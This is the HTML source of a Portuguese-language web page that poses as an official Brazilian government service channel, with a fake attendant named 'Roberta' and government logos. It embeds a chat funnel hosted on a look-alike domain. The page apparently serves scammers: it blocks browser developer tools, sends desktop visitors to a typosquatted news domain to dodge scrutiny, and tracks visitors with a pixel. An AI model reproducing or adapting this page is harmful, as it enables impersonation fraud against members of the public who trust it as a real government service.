f<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Atendimento Seguro</title>
    <script disable-devtool-auto="" src="disable-devtool-1.html" url="https://notlciasbrasillhoje.online/lp/"></script>
 <script type="text/javascript">
  if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
    window.location.href = 'https://notlciasbrasillhoje.online/lp/';
  }
  </script>  
    <script>
        window.pixelId = "67b759e9f454faf48c0999a2";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
    </script>
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
    <style>
        body {
            background-color: #FFFF;
            /* Cor de fundo azul */
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        header {
            box-shadow: 4px 4px 10px rgba(0, 0, 0, 0.5);
            background-color: #ffffff;
            /* Fundo branco para o cabeçalho */
            padding: 0;
            overflow: hidden;
            /* Garante que a imagem se ajuste corretamente */
        }

        header img {
            width: 110px;
            /* A imagem ocupa 100% da largura do cabeçalho */
            margin: 10px;
            height: auto;
            /* A altura será ajustada automaticamente para manter a proporção */
        }

        header h1 {
            color: #333;
            font-size: 2em;
            margin: 0;
            text-align: center;
        }

        .content {

            padding: 25px;
            color: #fff;
        }

        .content p {
            font-size: 1.2em;
        }

        iframe {
            box-shadow: 4px 4px 10px rgba(0, 0, 0, 0.5);
            border-radius: 0.1rem;
            width: 100%;
            height: 600px;
            /* Altura do iframe ajustável */
            border: none;
            /* Remove a borda padrão do iframe */
        }

        .notification {
            position: absolute;
            /* Sobrepõe o cabeçalho */
            top: 10px;
            /* Ajuste para ficar logo abaixo da parte superior */
            left: 50%;
            /* Centraliza horizontalmente */
            transform: translateX(-50%);
            /* Centraliza corretamente */
            width: 80%;
            /* Largura relativa à tela (pode ajustar conforme necessário) */

            background-color: #fff;
            /* Cor de fundo branca */
            color: #333;
            /* Cor do texto */
            padding: 5px;
            /* Espaçamento interno */
            border: 1px solid #ddd;
            /* Borda cinza clara */
            border-radius: 8px;
            /* Bordas arredondadas */
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            /* Sombra elegante */
            display: flex;
            /* Para alinhar texto e botão horizontalmente */
            justify-content: space-between;
            /* Espaça o texto e o botão */
            align-items: center;
            /* Centraliza verticalmente */
            font-family: Arial, sans-serif;
            /* Fonte */
            z-index: 9999;
            /* Garante que fique acima de outros elementos */
            animation: fade-in 0.5s ease-in-out;
            /* Animação ao aparecer */
        }

        .notification button {
            background: none;
            /* Sem cor de fundo */
            border: none;
            /* Sem bordas */
            font-size: 12px;
            /* Tamanho do botão */
            cursor: pointer;
            /* Ícone clicável */
            color: #666;
            /* Cor do botão */
        }

        .notification button:hover {
            color: #ff0000;
            /* Muda a cor ao passar o mouse */
        }

        /* Animação de fade-in */
        @keyframes fade-in {
            from {
                opacity: 0;
                transform: translateX(-50%) translateY(-10px);
            }

            to {
                opacity: 1;
                transform: translateX(-50%) translateY(0);
            }
        }
    </style>
    <style>
        /* Estilização do pré-carregador */
        #preloader {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: #ffffff;
            display: flex;
            justify-content: center;
            /* Centraliza horizontalmente */
            align-items: center;
            /* Centraliza verticalmente */
            z-index: 9999;
        }

        .loader-gif {
            width: 230px;
            /* Tamanho do GIF ajustável */
            height: 230px;
        }
    </style>
</head>

<body>
    <header>
        <img src="images/gov.png" alt="Logo"> <!-- A imagem ocupa 100% da largura -->
        <div id="notification" class="notification">
            <p><strong>Atendente Roberta:</strong> Esse é o Canal de Atendimento <strong style="color:#004b89">Oficial
                    do Governo!</strong></p>
            <button onclick="closeNotification()">✖</button>

        </div>
    </header>


    <div id="preloader">
        <img src="images/loader-2.gif" alt="Carregando..." class="loader-gif">
    </div>
    <p> </p>
    <div class="content">
        <!-- Iframe que hospeda o funil Typebot -->
        <iframe id="typebot" title="Funil Typebot"></iframe>
    </div>

    <div class="flex items-center w-full justify-center"
        style="display: flex; align-items: center; width: 100%; justify-content: center;">
        <img alt="bc" fetchpriority="high" width="240" height="16" decoding="async" loading="lazy" data-nimg="1"
            class="h-auto" style="color:transparent; width: 300px; height: auto;"
            src="images/min-cidades-gov-logo-1-2.png">
    </div>
    <script>
        const iframe = document.getElementById("typebot");
        const searchParams = new URLSearchParams(window.location.search);
        iframe.src = `https://chat.brasil-atendimentos.online/oficial?${searchParams.toString()}`;
        
    </script>

    <script>
        function closeNotification() {
            const notification = document.getElementById("notification");
            notification.style.display = "none"; // Esconde a notificação
        }

        // Remove a notificação automaticamente após 5 segundos
        setTimeout(() => {
            closeNotification();
        }, 100000); // 5000 ms = 3 segundos

        window.addEventListener('load', () => {
            setTimeout(() => {
                const preloader = document.getElementById('preloader');
                if (preloader) {
                    preloader.style.display = 'none';// Mostra o conteúdo do site
                }
            }, 4000); // 4000ms = 2 segundos
        });
    </script>

</body>

</html>